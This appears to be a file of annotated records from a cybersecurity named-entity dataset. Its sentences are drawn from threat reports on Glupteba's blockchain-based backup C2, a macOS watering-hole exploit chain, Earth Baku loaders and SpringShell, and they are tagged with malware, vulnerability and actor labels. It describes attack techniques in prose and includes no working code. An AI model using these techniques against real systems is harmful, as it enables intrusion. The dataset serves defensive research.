{"id":2290,"text":"In the event that the main C2 servers do not respond, the infected systems can retrieve backup domains encrypted in the latest transaction from the following bitcoin wallet addresses: The following 32 byte AES keys for decryption are hard coded in the binaries: The blockchain transaction’s OP_RETURN data can be decrypted using AES-256 GCM to provide a backup command and control domain name.","entities":[],"relations":[],"Comments":[]} {"id":2291,"text":"The first 12 bytes of the OP_RETURN contains the IV, the last 16 bytes the GCM tag, while the middle section is the AES-256 GCM encrypted domain","entities":[],"relations":[],"Comments":[]} {"id":2292,"text":"Full details of Glupteba’s network protocol can be found in this report from 2020, the following Python script illustrates how one can decrypt an encrypted domain name:","entities":[{"id":45447,"label":"TIME","start_offset":77,"end_offset":81},{"id":45446,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} {"id":2293,"text":"Recent domains used for command and control:","entities":[],"relations":[],"Comments":[]} {"id":2294,"text":" Recent sha256 hashes of malware samples:","entities":[],"relations":[],"Comments":[]} {"id":2295,"text":" This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q4 2021.","entities":[{"id":45448,"label":"TIME","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} {"id":2296,"text":"It was last updated on February 7, 2022.","entities":[{"id":47362,"label":"TIME","start_offset":23,"end_offset":39}],"relations":[],"Comments":[]} {"id":2297,"text":"To protect our users, TAG routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[{"id":47363,"label":"identity","start_offset":22,"end_offset":25}],"relations":[],"Comments":[]} {"id":2298,"text":"In late August 2021, TAG discovered watering hole attacks targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.","entities":[{"id":45449,"label":"TIME","start_offset":8,"end_offset":19},{"id":45451,"label":"attack-pattern","start_offset":36,"end_offset":49},{"id":45453,"label":"identity","start_offset":134,"end_offset":173},{"id":45452,"label":"location","start_offset":80,"end_offset":90},{"id":45450,"label":"identity","start_offset":21,"end_offset":24}],"relations":[{"id":97,"from_id":45453,"to_id":45451,"type":"targets"},{"id":96,"from_id":45451,"to_id":45452,"type":"targets"}],"Comments":[]} {"id":2299,"text":"The watering hole served an XNU privilege escalation vulnerability (CVE-2021-30869) unpatched in macOS Catalina, which led to the installation of a previously unreported backdoor.","entities":[{"id":47364,"label":"vulnerability","start_offset":68,"end_offset":82},{"id":47365,"label":"SOFTWARE","start_offset":97,"end_offset":111},{"id":47366,"label":"vulnerability","start_offset":28,"end_offset":66}],"relations":[{"id":315,"from_id":47365,"to_id":47364,"type":"has"}],"Comments":[]} {"id":2300,"text":"As is our policy, we quickly reported this 0-day to the vendor (Apple) and a patch was released to protect users from these attacks.","entities":[{"id":47367,"label":"identity","start_offset":64,"end_offset":69}],"relations":[],"Comments":[]} {"id":2301,"text":"Based on our findings, we believe this threat actor to be a well-resourced group, likely state backed, with access to their own software engineering team based on the quality of the payload code.","entities":[],"relations":[],"Comments":[]} {"id":2302,"text":"In this blog we analyze the technical details of the exploit chain and share IOCs to help teams defend against similar style attacks.","entities":[],"relations":[],"Comments":[]} {"id":2303,"text":" The websites leveraged for the attacks contained two iframes which served exploits from an attacker-controlled server—one for iOS and the other for macOS.","entities":[{"id":47368,"label":"SOFTWARE","start_offset":127,"end_offset":130},{"id":47369,"label":"SOFTWARE","start_offset":149,"end_offset":154}],"relations":[],"Comments":[]} {"id":2304,"text":"iOS Exploits","entities":[{"id":45455,"label":"SOFTWARE","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":2305,"text":"The iOS exploit chain used a framework based on Ironsquirrel to encrypt exploits delivered to the victim's browser.","entities":[{"id":6866,"label":"malware","start_offset":48,"end_offset":60},{"id":47370,"label":"SOFTWARE","start_offset":4,"end_offset":7}],"relations":[],"Comments":[]} {"id":2306,"text":"We did not manage to get a complete iOS chain this time, just a partial one where CVE-2019-8506 was used to get code execution in Safari.","entities":[{"id":47373,"label":"SOFTWARE","start_offset":130,"end_offset":136},{"id":47371,"label":"SOFTWARE","start_offset":36,"end_offset":39},{"id":47372,"label":"vulnerability","start_offset":82,"end_offset":95}],"relations":[],"Comments":[]} {"id":2307,"text":"macOS Exploits","entities":[{"id":45454,"label":"SOFTWARE","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":2308,"text":"The macOS exploits did not use the same framework as iOS ones.","entities":[{"id":47374,"label":"SOFTWARE","start_offset":4,"end_offset":9},{"id":47375,"label":"SOFTWARE","start_offset":53,"end_offset":56}],"relations":[],"Comments":[]} {"id":2309,"text":"The landing page contained a simple HTML page loading two scripts—one for Capstone.js and another for the exploit chain.","entities":[{"id":47396,"label":"SOFTWARE","start_offset":74,"end_offset":85}],"relations":[],"Comments":[]} {"id":2310,"text":"The parameter rid is a global counter which records the number of exploitation attempts.","entities":[],"relations":[],"Comments":[]} {"id":2311,"text":"This number was in the 200s when we obtained the exploit chain.","entities":[],"relations":[],"Comments":[]} {"id":2312,"text":"While the javascript starting the exploit chain checks whether visitors were running macOS Mojave (10.14) or Catalina (10.15) before proceeding to run the exploits, we only observed remnants of an exploit when visiting the site with Mojave but received the full non-encrypted exploit chain when browsing the site with Catalina.","entities":[{"id":47376,"label":"SOFTWARE","start_offset":85,"end_offset":105},{"id":47377,"label":"SOFTWARE","start_offset":109,"end_offset":125},{"id":47378,"label":"SOFTWARE","start_offset":233,"end_offset":239},{"id":47379,"label":"SOFTWARE","start_offset":318,"end_offset":326}],"relations":[],"Comments":[]} {"id":2313,"text":"The exploit chain combined an RCE in WebKit exploiting CVE-2021-1789 which was patched on Jan 5, 2021 before discovery of this campaign and a 0-day local privilege escalation in XNU (CVE-2021-30869) patched on Sept 23, 2021.","entities":[{"id":45456,"label":"vulnerability","start_offset":55,"end_offset":68},{"id":45462,"label":"SOFTWARE","start_offset":178,"end_offset":181},{"id":45460,"label":"TIME","start_offset":210,"end_offset":223},{"id":45461,"label":"attack-pattern","start_offset":148,"end_offset":174},{"id":45457,"label":"SOFTWARE","start_offset":37,"end_offset":43},{"id":45458,"label":"TIME","start_offset":90,"end_offset":101},{"id":45459,"label":"vulnerability","start_offset":183,"end_offset":197}],"relations":[{"id":98,"from_id":45456,"to_id":45457,"type":"has"},{"id":99,"from_id":45459,"to_id":45462,"type":"has"}],"Comments":[]} {"id":2314,"text":" Loading a page with the WebKit RCE on the latest version of Safari (14.1), we learned the RCE was an n-day since it did not successfully trigger the exploit.","entities":[{"id":47386,"label":"vulnerability","start_offset":32,"end_offset":35},{"id":47387,"label":"vulnerability","start_offset":91,"end_offset":94},{"id":47383,"label":"SOFTWARE","start_offset":25,"end_offset":31},{"id":47385,"label":"SOFTWARE","start_offset":61,"end_offset":74}],"relations":[],"Comments":[]} {"id":2315,"text":"To verify this hypothesis, we ran git bisect and determined it was fixed in this commit.","entities":[],"relations":[],"Comments":[]} {"id":2316,"text":"Capstone.js","entities":[{"id":45463,"label":"SOFTWARE","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":2317,"text":"It was interesting to see the use of Capstone.js, a port of the Capstone disassembly framework, in an exploit chain as Capstone is typically used for binary analysis.","entities":[{"id":47388,"label":"SOFTWARE","start_offset":37,"end_offset":48},{"id":47391,"label":"SOFTWARE","start_offset":119,"end_offset":127},{"id":47390,"label":"SOFTWARE","start_offset":64,"end_offset":94}],"relations":[],"Comments":[]} {"id":2318,"text":"The exploit authors primarily used it to search for the addresses of dlopen and dlsym in memory.","entities":[],"relations":[],"Comments":[]} {"id":2319,"text":"Once the embedded Mach-O is loaded, the dlopen and dlsym addresses found using Capstone.js are used to patch the Mach-O loaded in memory.","entities":[{"id":47393,"label":"SOFTWARE","start_offset":79,"end_offset":90}],"relations":[],"Comments":[]} {"id":2320,"text":"With the Capstone.js configured for X86-64 and not ARM, we can also derive the target hardware is Intel-based Macs.","entities":[{"id":47394,"label":"SOFTWARE","start_offset":9,"end_offset":20}],"relations":[],"Comments":[]} {"id":2321,"text":"Embedded Mach-O","entities":[],"relations":[],"Comments":[]} {"id":2322,"text":"After the WebKit RCE succeeds, an embedded Mach-O binary is loaded into memory, patched, and run.","entities":[{"id":47397,"label":"SOFTWARE","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} {"id":2323,"text":"Upon analysis, we realized this binary contained code which could escape the Safari sandbox, elevate privileges, and download a second stage from the C2.","entities":[{"id":47398,"label":"SOFTWARE","start_offset":77,"end_offset":83}],"relations":[],"Comments":[]} {"id":2324,"text":"Analyzing the Mach-O was reminiscent of a CTF reverse engineering challenge.","entities":[],"relations":[],"Comments":[]} {"id":2325,"text":"It had to be extracted and converted into binary from a Uint32Array.","entities":[],"relations":[],"Comments":[]} {"id":2326,"text":"Then the extracted binary was heavily obfuscated with a relatively tedious encoding mechanism--each string is XOR encoded with a different key.","entities":[],"relations":[],"Comments":[]} {"id":2327,"text":"Fully decoding the Mach-O was necessary to obtain all the strings representing the dynamically loaded functions used in the binary.","entities":[],"relations":[],"Comments":[]} {"id":2328,"text":"There were a lot of strings and decoding them manually would have taken a long time so we wrote a short Python script to make quick work of the obfuscation.","entities":[],"relations":[],"Comments":[]} {"id":2329,"text":"The script parsed the Mach-O at each section where the strings were located, then decoded the strings with their respective XOR keys, and patched the binary with the resulting strings.","entities":[],"relations":[],"Comments":[]} {"id":2330,"text":"Once we had all of the strings decoded, it was time to figure out what capabilities the binary had.","entities":[],"relations":[],"Comments":[]} {"id":2331,"text":"There was code to download a file from a C2 but we did not come across any URL strings in the Mach-O so we checked the javascript and saw there were two arguments passed when the binary is run–the url for the payload and its size","entities":[],"relations":[],"Comments":[]} {"id":2332,"text":"After downloading the payload, it removes the quarantine attribute of the file to bypass Gatekeeper.","entities":[],"relations":[],"Comments":[]} {"id":2333,"text":"It then elevated privileges to install the payload.","entities":[],"relations":[],"Comments":[]} {"id":2334,"text":"day or 0-day?","entities":[],"relations":[],"Comments":[]} {"id":2335,"text":"Before further analyzing how the exploit elevated privileges, we needed to figure out if we were dealing with an N-day or a 0-day vulnerability.","entities":[],"relations":[],"Comments":[]} {"id":2336,"text":"An N-day is a known vulnerability with a publicly available patch.","entities":[],"relations":[],"Comments":[]} {"id":2337,"text":"Threat actors have used N-days shortly after a patch is released to capitalize on the patching delay of their targets.","entities":[],"relations":[],"Comments":[]} {"id":2338,"text":"In contrast, a 0-day is a vulnerability with no available patch which makes it harder to defend against.","entities":[],"relations":[],"Comments":[]} {"id":2339,"text":"Despite the exploit being an executable instead of shellcode, it was not a standalone binary we could run in our virtual environment.","entities":[],"relations":[],"Comments":[]} {"id":2340,"text":"It needed the address of dlopen and dlsym patched after the binary was loaded into memory.","entities":[],"relations":[],"Comments":[]} {"id":2341,"text":"These two functions are used in conjunction to dynamically load a shared object into memory and retrieve the address of a symbol from it.","entities":[],"relations":[],"Comments":[]} {"id":2342,"text":"They are the equivalent of LoadLibrary and GetProcAddress in Windows.","entities":[{"id":47399,"label":"SOFTWARE","start_offset":61,"end_offset":68}],"relations":[],"Comments":[]} {"id":2343,"text":"To run the exploit in our virtual environment, we decided to write a loader in Python which did the following: For our payload, we wrote a simple bash script which runs id and pipes the result to a file in \/tmp.","entities":[],"relations":[],"Comments":[]} {"id":2344,"text":"The result of the id command would tell us whether our script was run as a regular user or as root.","entities":[],"relations":[],"Comments":[]} {"id":2345,"text":"Having a loader and a payload ready, we set out to test the exploit on a fresh install of Catalina (10.15) since it was the version in which we were served the full exploit chain.","entities":[{"id":47400,"label":"SOFTWARE","start_offset":90,"end_offset":106}],"relations":[],"Comments":[]} {"id":2346,"text":"The exploit worked and ran our bash script as root.","entities":[],"relations":[],"Comments":[]} {"id":2347,"text":"We updated our operating system with the latest patch at the time (2021-004) and tried the exploit again.","entities":[{"id":47401,"label":"TIME","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} {"id":2348,"text":"It still worked.","entities":[],"relations":[],"Comments":[]} {"id":2349,"text":"We then decided to try it on Big Sur (11.4) where it crashed and gave us the following exception.","entities":[{"id":45465,"label":"SOFTWARE","start_offset":29,"end_offset":43}],"relations":[],"Comments":[]} {"id":2350,"text":"The exception indicates that Apple added generic protections in Big Sur which rendered this exploit useless.","entities":[{"id":47405,"label":"SOFTWARE","start_offset":64,"end_offset":71},{"id":47404,"label":"identity","start_offset":29,"end_offset":34}],"relations":[],"Comments":[]} {"id":2351,"text":"Since Apple still supports Catalina and pushes security updates for it, we decided to take a deeper look into this exploit.","entities":[{"id":47406,"label":"identity","start_offset":6,"end_offset":11},{"id":47407,"label":"SOFTWARE","start_offset":27,"end_offset":35}],"relations":[],"Comments":[]} {"id":2352,"text":"Elevating Privileges to Root The Mach-O was calling a lot of undocumented functions as well as XPC calls to mach_msg with a MACH_SEND_SYNC_OVERRIDE flag.","entities":[],"relations":[],"Comments":[]} {"id":2353,"text":"This looked similar to an earlier in-the-wild iOS vulnerability analyzed by Ian Beer of Google Project Zero.","entities":[{"id":47408,"label":"SOFTWARE","start_offset":46,"end_offset":49},{"id":47409,"label":"identity","start_offset":88,"end_offset":107},{"id":47410,"label":"identity","start_offset":76,"end_offset":84}],"relations":[],"Comments":[]} {"id":2354,"text":"Beer was able to quickly recognize this exploit as a variant of an earlier port type confusion vulnerability he analyzed in the XNU kernel (CVE-2020-27932).","entities":[{"id":47411,"label":"SOFTWARE","start_offset":128,"end_offset":138},{"id":47412,"label":"vulnerability","start_offset":140,"end_offset":154}],"relations":[{"id":318,"from_id":47412,"to_id":47411,"type":"has"}],"Comments":[]} {"id":2355,"text":"Furthermore, it seems this exact exploit was presented by Pangu Lab in a public talk at zer0con21 in April 2021 and Mobile Security Conference (MOSEC) in July 2021.","entities":[{"id":45470,"label":"identity","start_offset":58,"end_offset":67},{"id":45468,"label":"identity","start_offset":116,"end_offset":150},{"id":45469,"label":"TIME","start_offset":154,"end_offset":163},{"id":45466,"label":"identity","start_offset":88,"end_offset":97},{"id":45467,"label":"TIME","start_offset":101,"end_offset":111}],"relations":[],"Comments":[]} {"id":2356,"text":"In exploiting this port type confusion vulnerability, the exploit authors were able to change the mach port type from IKOT_NAMED_ENTRY to a more privileged port type like IKOT_HOST_SECURITY allowing them to forge their own sec_token and audit_token, and IKOT_HOST_PRIV enabling them to spoof messages to kuncd. After gaining root, the downloaded payload is loaded and run in the background on the victim's machine via launchtl.","entities":[],"relations":[],"Comments":[]} {"id":2357,"text":"The payload seems to be a product of extensive software engineering.","entities":[],"relations":[],"Comments":[]} {"id":2358,"text":"It uses a publish-subscribe model via a Data Distribution Service (DDS) framework for communicating with the C2.","entities":[{"id":47413,"label":"SOFTWARE","start_offset":40,"end_offset":71}],"relations":[],"Comments":[]} {"id":2359,"text":"It also has several components, some of which appear to be configured as modules.","entities":[],"relations":[],"Comments":[]} {"id":2360,"text":"For example, the payload we obtained contained a kernel module for capturing keystrokes.","entities":[],"relations":[],"Comments":[]} {"id":2361,"text":"There are also other functionalities built-in to the components which were not directly accessed from the binaries included in the payload but may be used by additional stages which can be downloaded onto the victim's machine.","entities":[],"relations":[],"Comments":[]} {"id":2362,"text":"Notable features for this backdoor include: Our team is constantly working to secure our users and keep them safe from targeted attacks like this one.","entities":[],"relations":[],"Comments":[]} {"id":2363,"text":"We continue to collaborate with internal teams like Google Safe Browsing to block domains and IPs used for exploit delivery and industry partners like Apple to mitigate vulnerabilities.","entities":[{"id":47414,"label":"SOFTWARE","start_offset":52,"end_offset":72},{"id":47415,"label":"identity","start_offset":151,"end_offset":156}],"relations":[],"Comments":[]} {"id":2364,"text":"We are appreciative of Apple’s quick response and patching of this critical vulnerability.","entities":[{"id":47416,"label":"identity","start_offset":23,"end_offset":28}],"relations":[],"Comments":[]} {"id":2365,"text":"For those interested in following our in-the-wild work, we will soon publish details surrounding another, unrelated campaign we discovered using two Chrome 0-days (CVE-2021-37973 and CVE-2021-37976).","entities":[{"id":47418,"label":"vulnerability","start_offset":183,"end_offset":197},{"id":47419,"label":"SOFTWARE","start_offset":149,"end_offset":155},{"id":47417,"label":"vulnerability","start_offset":164,"end_offset":178}],"relations":[{"id":319,"from_id":47419,"to_id":47417,"type":"has"},{"id":320,"from_id":47419,"to_id":47418,"type":"has"}],"Comments":[]} {"id":2366,"text":"That campaign is not connected to the one described in today’s post.","entities":[],"relations":[],"Comments":[]} {"id":2367,"text":" Delivery URLs Javascript Sandbox escape \/ LPE Backdoor C2","entities":[],"relations":[],"Comments":[]} {"id":2368,"text":"We have uncovered a cyberespionage campaign being perpetrated by Earth Baku, an advanced persistent threat (APT) group with a known history of carrying out cyberattacks under the alias APT41.","entities":[{"id":47423,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":47424,"label":"threat-actor","start_offset":65,"end_offset":75}],"relations":[{"id":321,"from_id":47424,"to_id":47423,"type":"duplicate-of"}],"Comments":[]} {"id":2369,"text":"This is not the group’s first foray into cyberespionage, and its long list of past cybercrimes also includes ransomware and cryptocurrency mining attacks.","entities":[],"relations":[],"Comments":[]} {"id":2370,"text":"Earth Baku deploys its ongoing campaign, which can be traced to as far back as July 2020, through multiple attack vectors that are designed based on different exploits or the infrastructure of its targeted victim's environment: • SQL injection to upload a malicious file • Installment through InstallUtil.exe in a scheduled task • Possibly a malicious link (LNK) file sent as an email attachment • Exploitation of the ProxyLogon vulnerability CVE-2021-26855 to upload a China Chopper web shell This campaign uses previously unidentified shellcode loaders, which we have named StealthVector and StealthMutant, and a backdoor, which we have dubbed ScrambleCross.","entities":[{"id":45480,"label":"threat-actor","start_offset":0,"end_offset":10},{"id":45472,"label":"vulnerability","start_offset":444,"end_offset":458},{"id":45474,"label":"malware","start_offset":578,"end_offset":591},{"id":45475,"label":"malware","start_offset":596,"end_offset":609},{"id":45476,"label":"malware","start_offset":648,"end_offset":661},{"id":45477,"label":"TIME","start_offset":79,"end_offset":88},{"id":45478,"label":"FILEPATH","start_offset":294,"end_offset":309},{"id":45479,"label":"vulnerability","start_offset":419,"end_offset":429},{"id":7033,"label":"attack-pattern","start_offset":231,"end_offset":244},{"id":7034,"label":"attack-pattern","start_offset":315,"end_offset":329},{"id":7036,"label":"malware","start_offset":471,"end_offset":484}],"relations":[{"id":100,"from_id":45479,"to_id":45472,"type":"duplicate-of"},{"id":323,"from_id":45480,"to_id":7033,"type":"uses"},{"id":324,"from_id":45480,"to_id":7034,"type":"uses"}],"Comments":[]} {"id":2371,"text":"Earth Baku has developed these new malware tools to facilitate targeted attacks on public and private entities alike in specific industries that are located in the Indo-Pacific region.","entities":[{"id":47426,"label":"threat-actor","start_offset":0,"end_offset":10},{"id":47427,"label":"location","start_offset":164,"end_offset":176}],"relations":[],"Comments":[]} {"id":2373,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":2374,"text":"Countries affected by Earth Baku’s new campaign Source: Trend Micro™ Smart Protection Network™ infrastructure StealthVector","entities":[{"id":47434,"label":"threat-actor","start_offset":22,"end_offset":32},{"id":47436,"label":"malware","start_offset":110,"end_offset":123},{"id":47435,"label":"SOFTWARE","start_offset":56,"end_offset":94}],"relations":[],"Comments":[]} {"id":2375,"text":"We initially observed StealthVector, a shellcode loader written in C\/C++, in October 2020.","entities":[{"id":47437,"label":"malware","start_offset":22,"end_offset":35},{"id":47438,"label":"TIME","start_offset":77,"end_offset":89}],"relations":[],"Comments":[]} {"id":2376,"text":"StealthVector is designed with various configurable features that make it easy for malicious actors to modify and tailor it to their needs, including a feature that disables Event Tracing for Windows (ETW), allowing the malware to run in stealth mode.","entities":[{"id":45481,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":2377,"text":"This loader can stealthily run its payload in various ways, such as using the CreateThread function, bypassing Microsoft’s Control Flow Guard (CFG), module stomping, and phantom dynamic link library (DLL) hollowing.","entities":[{"id":47439,"label":"SOFTWARE","start_offset":111,"end_offset":147}],"relations":[],"Comments":[]} {"id":2378,"text":"StealthMutant Like StealthVector, StealthMutant, which supports both 32-bit and 64-bit operating systems, can disable ETW.","entities":[{"id":47440,"label":"malware","start_offset":0,"end_offset":13},{"id":47442,"label":"malware","start_offset":34,"end_offset":47},{"id":47441,"label":"malware","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} {"id":2379,"text":"This loader, written in C#, has been used by malicious actors since July 2020.","entities":[{"id":45482,"label":"TIME","start_offset":68,"end_offset":77}],"relations":[],"Comments":[]} {"id":2380,"text":"Many of the StealthMutant samples we have analyzed use AES-256-ECB for decryption; alternatively, an earlier variant of the loader uses XOR.","entities":[{"id":47443,"label":"malware","start_offset":12,"end_offset":25}],"relations":[],"Comments":[]} {"id":2381,"text":"After its payload is decrypted, StealthMutant performs process hollowing to execute its payload in a remote process.","entities":[{"id":7081,"label":"attack-pattern","start_offset":55,"end_offset":72},{"id":47444,"label":"malware","start_offset":32,"end_offset":45}],"relations":[{"id":325,"from_id":47444,"to_id":7081,"type":"uses"}],"Comments":[]} {"id":2382,"text":"ScrambleCross","entities":[{"id":45483,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":2383,"text":"Both StealthMutant and StealthVector contain a payload of either the Cobalt Strike beacon or ScrambleCross, a newly discovered backdoor.","entities":[{"id":47445,"label":"malware","start_offset":5,"end_offset":18},{"id":47448,"label":"malware","start_offset":93,"end_offset":106},{"id":47446,"label":"malware","start_offset":23,"end_offset":36},{"id":47447,"label":"tools","start_offset":69,"end_offset":82}],"relations":[{"id":326,"from_id":47446,"to_id":47447,"type":"uses"},{"id":327,"from_id":47446,"to_id":47448,"type":"uses"},{"id":328,"from_id":47445,"to_id":47447,"type":"uses"},{"id":329,"from_id":47445,"to_id":47448,"type":"uses"}],"Comments":[]} {"id":2384,"text":"ScrambleCross receives instructions from its command-and-control (C&C) server that allow it to receive and manipulate plug-ins.","entities":[{"id":47449,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":2385,"text":"However, we have yet to retrieve and study one of these plug-ins.","entities":[],"relations":[],"Comments":[]} {"id":2386,"text":"It has many of the same capabilities as another backdoor, Crosswalk, which has also been used by Earth Baku.","entities":[{"id":47451,"label":"threat-actor","start_offset":97,"end_offset":107},{"id":47450,"label":"malware","start_offset":58,"end_offset":67}],"relations":[{"id":330,"from_id":47451,"to_id":47450,"type":"uses"}],"Comments":[]} {"id":2387,"text":"For example, both calculate the hash of the code section as an anti-bugging technique, both are designed as fully position-independent code, and both support various kinds of network communication protocols.","entities":[],"relations":[],"Comments":[]} {"id":2388,"text":"Connections to other campaigns Earth Baku’s recent activities are related to another campaign that has been active since at least November 2018, as reported by FireEye and Positive Technologies.","entities":[{"id":45485,"label":"TIME","start_offset":130,"end_offset":143},{"id":45487,"label":"identity","start_offset":172,"end_offset":193},{"id":45486,"label":"identity","start_offset":160,"end_offset":167},{"id":45484,"label":"threat-actor","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} {"id":2389,"text":"While the older campaign uses a different shellcode loader, which we have named LavagokLdr, we have observed similar code and procedures between LavagokLdr and StealthVector.","entities":[{"id":47452,"label":"malware","start_offset":80,"end_offset":90},{"id":47453,"label":"malware","start_offset":145,"end_offset":155},{"id":47454,"label":"malware","start_offset":160,"end_offset":173}],"relations":[],"Comments":[]} {"id":2390,"text":"In the same vein, we have observed that LavagokLdr’s payload, Crosswalk, and one of StealthVector’s payloads, ScrambleCross, perform similar techniques for decryption and signature checking.","entities":[{"id":47455,"label":"malware","start_offset":40,"end_offset":50},{"id":47456,"label":"malware","start_offset":62,"end_offset":71},{"id":47458,"label":"malware","start_offset":110,"end_offset":123},{"id":47457,"label":"malware","start_offset":84,"end_offset":98}],"relations":[],"Comments":[]} {"id":2391,"text":"But because Earth Baku has updated its toolset with StealthVector, StealthMutant, and ScrambleCross for this new campaign, we have identified it as its own separate operation.","entities":[{"id":45488,"label":"threat-actor","start_offset":12,"end_offset":22},{"id":45490,"label":"malware","start_offset":52,"end_offset":65},{"id":45491,"label":"malware","start_offset":67,"end_offset":80},{"id":45492,"label":"malware","start_offset":86,"end_offset":99}],"relations":[{"id":102,"from_id":45488,"to_id":45491,"type":"uses"},{"id":103,"from_id":45488,"to_id":45492,"type":"uses"},{"id":101,"from_id":45488,"to_id":45490,"type":"uses"}],"Comments":[]} {"id":2392,"text":"Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":2393,"text":"A timeline of Earth Baku’s previous campaign as APT41 and its new campaign How Earth Baku creates its malware tools Earth Baku is known for its use of self-developed tools.","entities":[{"id":47459,"label":"threat-actor","start_offset":14,"end_offset":24},{"id":47460,"label":"threat-actor","start_offset":48,"end_offset":53},{"id":47461,"label":"threat-actor","start_offset":79,"end_offset":89},{"id":47462,"label":"threat-actor","start_offset":116,"end_offset":126}],"relations":[{"id":331,"from_id":47459,"to_id":47460,"type":"duplicate-of"}],"Comments":[]} {"id":2394,"text":"To continue doing so, it appears to be filling its ranks with malicious actors who are pooling their diverse skills.","entities":[],"relations":[],"Comments":[]} {"id":2395,"text":"Interestingly, the new malware tools involved in Earth Baku’s new campaign indicates that the APT group has likely recruited members who specialize in low-level programming, software development, and red-team techniques.","entities":[{"id":47463,"label":"threat-actor","start_offset":49,"end_offset":59}],"relations":[],"Comments":[]} {"id":2396,"text":"For more details about Earth Baku’s new campaign, read our research paper \"Earth Baku: An APT Group Targeting Indo-Pacific Countries With New Stealth Loaders and Backdoor.\" Tags Articles, News, Reports | APT & Targeted Attacks | Research","entities":[{"id":47464,"label":"threat-actor","start_offset":23,"end_offset":34},{"id":47465,"label":"threat-actor","start_offset":75,"end_offset":85},{"id":47466,"label":"location","start_offset":110,"end_offset":122}],"relations":[],"Comments":[]} {"id":2397,"text":"This post is also available in: 日本語 (Japanese) Recently, two vulnerabilities were announced within the Spring Framework, an open-source framework for building enterprise Java applications.","entities":[{"id":47467,"label":"SOFTWARE","start_offset":109,"end_offset":125}],"relations":[],"Comments":[]} {"id":2398,"text":"On March 29, 2022, the Spring Cloud Expression Resource Access Vulnerability tracked in CVE-2022-22963 was patched with the release of Spring Cloud Function 3.1.7 and 3.2.3.","entities":[{"id":47468,"label":"TIME","start_offset":3,"end_offset":17},{"id":47470,"label":"vulnerability","start_offset":88,"end_offset":102},{"id":47469,"label":"vulnerability","start_offset":23,"end_offset":76},{"id":47471,"label":"SOFTWARE","start_offset":135,"end_offset":172}],"relations":[{"id":332,"from_id":47471,"to_id":47470,"type":"has"}],"Comments":[]} {"id":2399,"text":"Two days later on March 31, 2022, Spring released version 5.3.18 and 5.2.20 of Spring Framework to patch another more severe vulnerability tracked in CVE-2022-22965.","entities":[{"id":47472,"label":"TIME","start_offset":18,"end_offset":32},{"id":47473,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":47474,"label":"SOFTWARE","start_offset":79,"end_offset":95},{"id":47475,"label":"vulnerability","start_offset":150,"end_offset":164}],"relations":[{"id":333,"from_id":47474,"to_id":47475,"type":"has"}],"Comments":[]} {"id":2400,"text":"The CVE-2022-22965 vulnerability allows an attacker unauthenticated remote code execution (RCE), which Unit 42 has observed being exploited in the wild.","entities":[{"id":45495,"label":"vulnerability","start_offset":4,"end_offset":18},{"id":45496,"label":"attack-pattern","start_offset":52,"end_offset":89},{"id":45497,"label":"identity","start_offset":103,"end_offset":110}],"relations":[{"id":105,"from_id":45496,"to_id":45495,"type":"delivers"}],"Comments":[]} {"id":2401,"text":"The exploitation of this vulnerability could result in a webshell being installed onto the compromised server that allows further command execution.","entities":[],"relations":[],"Comments":[]} {"id":2402,"text":"Because the Spring Framework is widely used for web system development and the severity of the vulnerability is critical (CVSS score of 9.8), CVE-2022-22965 is given the name SpringShell (and\/or Spring4Shell) by the infosec community.","entities":[{"id":47477,"label":"vulnerability","start_offset":142,"end_offset":156},{"id":47478,"label":"vulnerability","start_offset":175,"end_offset":186},{"id":47476,"label":"SOFTWARE","start_offset":12,"end_offset":28},{"id":47479,"label":"vulnerability","start_offset":195,"end_offset":207}],"relations":[],"Comments":[]} {"id":2403,"text":"To understand the impact of this vulnerability, we analyzed all the available information and located the issue in the source code.","entities":[],"relations":[],"Comments":[]} {"id":2404,"text":" On April 8, we updated this blog to include statistics on SpringShell exploitation attempts that we identified by analyzing hits on the Spring Core Remote Code Execution Vulnerability threat prevention signature for the Palo Alto Networks Next-Generation Firewall, as well as alerts triggered in Cortex XDR.","entities":[{"id":47484,"label":"SOFTWARE","start_offset":297,"end_offset":307},{"id":47480,"label":"TIME","start_offset":4,"end_offset":11},{"id":47481,"label":"vulnerability","start_offset":59,"end_offset":70},{"id":47482,"label":"vulnerability","start_offset":137,"end_offset":184},{"id":47483,"label":"SOFTWARE","start_offset":221,"end_offset":264}],"relations":[{"id":334,"from_id":47481,"to_id":47482,"type":"related-to"}],"Comments":[]} {"id":2405,"text":"We also added a section on indicators.","entities":[],"relations":[],"Comments":[]} {"id":2406,"text":" Palo Alto Networks customers receive protections against CVE-2022-22965 and CVE-2022-22963 via products and services including Cortex XDR Prevent and Pro, a Threat Prevention subscription for the Next-Generation Firewall, and Prisma Cloud Compute.","entities":[{"id":45498,"label":"identity","start_offset":1,"end_offset":19},{"id":45499,"label":"vulnerability","start_offset":58,"end_offset":72},{"id":45501,"label":"SOFTWARE","start_offset":128,"end_offset":154},{"id":45502,"label":"SOFTWARE","start_offset":227,"end_offset":247},{"id":45500,"label":"vulnerability","start_offset":77,"end_offset":91}],"relations":[],"Comments":[]} {"id":2407,"text":"Affected Software and Versions Background on the Spring Framework Root Cause Analysis for CVE-2022-22965","entities":[{"id":47486,"label":"vulnerability","start_offset":90,"end_offset":104},{"id":47485,"label":"SOFTWARE","start_offset":49,"end_offset":65}],"relations":[{"id":335,"from_id":47485,"to_id":47486,"type":"has"}],"Comments":[]} {"id":2408,"text":"Background on Exploitation of the Class Loader Establishing a Reverse Shell Connection to a Remote Server on the Compromised Server SpringShell Exploit Observed in the Wild 